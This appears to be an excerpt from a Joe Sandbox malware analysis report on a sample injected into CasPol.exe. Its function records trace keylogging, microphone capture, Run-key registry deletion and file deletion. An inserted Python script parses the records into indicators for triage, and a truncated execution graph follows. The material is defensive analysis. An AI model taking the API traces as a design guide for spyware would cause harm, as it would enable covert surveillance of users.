                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                                                                                                                                                  • API String ID: 1623830855-1496645233
                                                                                                                                                                                                                                  • Opcode ID: 66579ce885549906bf361f976415d7046a76c4188ad73fea538d879202c14992
                                                                                                                                                                                                                                  • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66579ce885549906bf361f976415d7046a76c4188ad73fea538d879202c14992
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00F553D8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00F553D8,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                                                  • String ID: T=G
                                                                                                                                                                                                                                  • API String ID: 2315374483-379896819
                                                                                                                                                                                                                                  • Opcode ID: 681d1aa608717ae782e0e359d0672b86d60b3e506acf780633a0be7ede32c365
                                                                                                                                                                                                                                  • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 681d1aa608717ae782e0e359d0672b86d60b3e506acf780633a0be7ede32c365
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LocaleValid
                                                                                                                                                                                                                                  • String ID: IsValidLocaleName$j=D
                                                                                                                                                                                                                                  • API String ID: 1901932003-3128777819
                                                                                                                                                                                                                                  • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                  • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: T=G$T=G
                                                                                                                                                                                                                                  • API String ID: 3519838083-3732185208
                                                                                                                                                                                                                                  • Opcode ID: d35d56db29c3f898e339c7594dbfd576fe9197a4ca502cfea50645c21fb802bf
                                                                                                                                                                                                                                  • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d35d56db29c3f898e339c7594dbfd576fe9197a4ca502cfea50645c21fb802bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
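The function records above (keylogger teardown via UnhookWindowsHookEx, microphone capture via waveInPrepareHeader/waveInAddBuffer, the "Offline Keylogger Started" / "Online Keylogger Stopped" strings, all inside the CasPol.exe image at 0x400000 in process 12) are easier to triage as structured data than as a wall of bullets. The following Python script is an added example and is not part of the Joe Sandbox report nor Joe Sandbox's own code: it parses records in exactly this layout into API calls, dump provenance and string IoCs, and tags each record with a coarse capability. The capability map, the rule that a non-hex API argument is a string literal, and the reading of the first dump-name component as the process number (0000000C matching the "12" in hcaresult_12_2_400000_CasPol.jbxd) are my assumptions; the sample input is constructed from two records of this listing.

```python
"""Parse Joe Sandbox 'code analysis' function records into IoCs and capability tags."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two records in the layout of the listing above, with the
# leading whitespace and "Download File" link text stripped.
SAMPLE = """\
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• Opcode ID: 66579ce885549906bf361f976415d7046a76c4188ad73fea538d879202c14992
APIs
• waveInPrepareHeader.WINMM(00F553D8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(00F553D8,00000020,?,00000000,00401913), ref: 0040175D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: T=G
• Opcode ID: 681d1aa608717ae782e0e359d0672b86d60b3e506acf780633a0be7ede32c365
"""

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source",
                    "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
# One API bullet: optional "Part of subcall function <addr>: ", then
# "<Name>.<MODULE>", optional "(args)", then "ref: <addr>".
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
HEX_ARG = re.compile(r"^[0-9A-F]{8}$")
# Heuristic map (my assumption, not Joe Sandbox's signature logic).
CAPABILITY_APIS = {
    "keylogging": {"SetWindowsHookExA", "SetWindowsHookExW", "UnhookWindowsHookEx",
                   "GetKeyState", "GetKeyboardState", "GetKeyboardLayout", "ToUnicodeEx"},
    "audio_capture": {"waveInOpen", "waveInPrepareHeader", "waveInAddBuffer", "waveInStart"},
    "file_probe": {"PathFileExistsA", "PathFileExistsW"},
}
CAPABILITY_STRINGS = {"keylogging": ("keylogger",)}


def literal_args(args: list[str]) -> list[str]:
    """Arguments that are neither '?' nor an 8-digit hex value are string literals."""
    return [a for a in args if a and a != "?" and not HEX_ARG.match(a)]


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                         # call-site address inside the dump
    subcall_of: int | None = None    # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, list[str]] = field(default_factory=dict)  # e.g. "Opcode ID"

    def first(self, key: str) -> str:
        return self.fields.get(key, [""])[0]

    @property
    def opcode_id(self) -> str:
        return self.first("Opcode ID")

    @property
    def snapshot(self) -> str:
        return self.first("Snapshot File")

    @property
    def process(self) -> int | None:
        src = self.first("Source File")   # leading component is the process number in hex
        return int(src.split(".", 1)[0], 16) if src else None

    @property
    def base(self) -> int | None:
        m = re.search(r"Offset: ([0-9A-Fa-f]+)", self.first("Source File"))
        return int(m.group(1), 16) if m else None

    @property
    def strings(self) -> list[str]:
        # "String ID" joins strings with '$'; literal API arguments count as strings.
        sid = self.first("String ID")
        found = sid.split("$") if sid else []
        for call in self.apis:
            found.extend(literal_args(call.args))
        return list(dict.fromkeys(found))        # de-duplicate, keep order


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADINGS:
            if line == "APIs":               # every record opens with its APIs heading
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                continue                     # unknown layout: skip, do not guess
            args = m.group("args").split(",") if m.group("args") is not None else []
            sub = m.group("sub")
            current.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        int(m.group("ref"), 16), int(sub, 16) if sub else None))
        else:
            key, _, value = body.partition(": ")
            current.fields.setdefault(key, []).append(value)
    return records


def capabilities(rec: FunctionRecord) -> set[str]:
    names = {c.name for c in rec.apis}
    caps = {cap for cap, apis in CAPABILITY_APIS.items() if names & apis}
    joined = " ".join(rec.strings).lower()
    caps |= {cap for cap, needles in CAPABILITY_STRINGS.items() if any(n in joined for n in needles)}
    return caps


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(f"process {rec.process} base {rec.base:#x} opcode {rec.opcode_id[:12]}...")
        print("  apis:", sorted({c.name for c in rec.apis}))
        print("  strings:", rec.strings, " capabilities:", sorted(capabilities(rec)))
```

Point it at a saved text copy of this section to get one row per function with its imports, strings and a tag; the tags are a triage aid for deciding which functions to open in the disassembly, not a verdict, and any API name the regex cannot read is skipped rather than guessed.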
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                                                                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                                                                                                                                                  • Opcode ID: e4783406b8090f957eb699ebcca1d9f5d1236a3a3c59c967461c79b8c7bb50b0
                                                                                                                                                                                                                                  • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4783406b8090f957eb699ebcca1d9f5d1236a3a3c59c967461c79b8c7bb50b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448825
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                                                  • String ID: `@$`@
                                                                                                                                                                                                                                  • API String ID: 1353095263-20545824
                                                                                                                                                                                                                                  • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                  • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State
                                                                                                                                                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                                                                                                                                                  • Opcode ID: 1a2acc7ae96ea6d3970b85c1ad092b7db079889dc64632d6b42e586a77c2ffe8
                                                                                                                                                                                                                                  • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a2acc7ae96ea6d3970b85c1ad092b7db079889dc64632d6b42e586a77c2ffe8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteOpenValue
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                                                                                                                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                                                  • API String ID: 3325800564-4028850238
                                                                                                                                                                                                                                  • Opcode ID: 058bd8072921940ac6c17e91e9c154a8c4f0c918009ed77795babcdc161dd952
                                                                                                                                                                                                                                  • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 058bd8072921940ac6c17e91e9c154a8c4f0c918009ed77795babcdc161dd952
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 1000A5D2
                                                                                                                                                                                                                                    • Part of subcall function 1000A547: std::exception::exception.LIBCONCRT ref: 1000A554
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A5E0
                                                                                                                                                                                                                                    • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
• String ID: Unknown exception
• API String ID: 1586462112-410509341
• Opcode ID: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
• Instruction ID: 0adb93ce51021025e8d7fce423e68b35576232a694bedcd472ba45c4d6c42089
• Opcode Fuzzy Hash: 8dd5df01de20f634a69ec2260896378e75b1805372777f46904e0a70281a341b
• Instruction Fuzzy Hash: F0D0A73C90010C77DB04DAA4DC41D9C776CFF05184FD08060B654C2145EB31EA998781
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
• WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
• Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
• Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
• Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
• Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CountInfoInputLastTick
• String ID: >G
• API String ID: 3478931382-1296849874
• Opcode ID: 1111c95a6731b81c7f960cf0461dbe35cffbdc62c157a0c369b4dce9d438a623
• Instruction ID: 0f25e8e52f9a29d92835049ed671f456ff59a02a7b46a548dc943f175ac88346
• Opcode Fuzzy Hash: 1111c95a6731b81c7f960cf0461dbe35cffbdc62c157a0c369b4dce9d438a623
• Instruction Fuzzy Hash: FCD0127040020DBFCB00DFE4EC4D98DBFFCEB00349F104168A005A2111DB70E6448B24
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
• GetLastError.KERNEL32 ref: 0043FB02
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
• Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
• Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
• Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 79
38381 409d1f 6 API calls 38368->38381 38382 445cc9 38369->38382 38890 4099c6 wcslen 38371->38890 38372 4456b2 38805 40b1ab free free 38372->38805 38374 40b2cc 27 API calls 38387 445a4f 38374->38387 38389 445be2 38375->38389 38376 403335 38516 4452e5 45 API calls 38376->38516 38377 445d3d 38409 40b2cc 27 API calls 38377->38409 38378 445d88 memset memset memset 38392 414c2e 16 API calls 38378->38392 38819 409b98 GetFileAttributesW 38379->38819 38380 445823 38380->38349 38391 4087b3 338 API calls 38380->38391 38393 4459bc 38381->38393 38394 409d1f 6 API calls 38382->38394 38587 444b06 38383->38587 38384 445879 38384->38359 38405 4087b3 338 API calls 38384->38405 38386->38333 38410 44594a 38386->38410 38767 409d1f wcslen wcslen 38387->38767 38398 40b2cc 27 API calls 38389->38398 38391->38380 38402 445dde 38392->38402 38886 409b98 GetFileAttributesW 38393->38886 38404 445ce1 38394->38404 38395 445bb3 38893 445403 memset 38395->38893 38396 445680 38396->38372 38637 4087b3 memset 38396->38637 38399 445bf3 38398->38399 38408 409d1f 6 API calls 38399->38408 38400 445928 38400->38410 38820 40b6ef 38400->38820 38411 40b2cc 27 API calls 38402->38411 38910 409b98 GetFileAttributesW 38404->38910 38405->38384 38419 445c07 38408->38419 38420 445d54 _wcsicmp 38409->38420 38410->38338 38424 4459ed 38410->38424 38423 445def 38411->38423 38412 4459cb 38412->38424 38433 40b6ef 252 API calls 38412->38433 38416 40b2cc 27 API calls 38417 445a94 38416->38417 38772 40ae18 38417->38772 38418 44566d 38418->38331 38688 413d4c 38418->38688 38429 445389 258 API calls 38419->38429 38430 445d71 38420->38430 38495 445d67 38420->38495 38422 445665 38804 40b1ab free free 38422->38804 38431 409d1f 6 API calls 38423->38431 38424->38343 38424->38344 38425->38376 38425->38377 38425->38378 38426 445389 258 API calls 38426->38350 38435 445c17 38429->38435 38911 445093 23 API calls 38430->38911 38438 445e03 38431->38438 38433->38424 38434 4456d8 38440 40b2cc 27 API calls 38434->38440 38441 40b2cc 27 API 
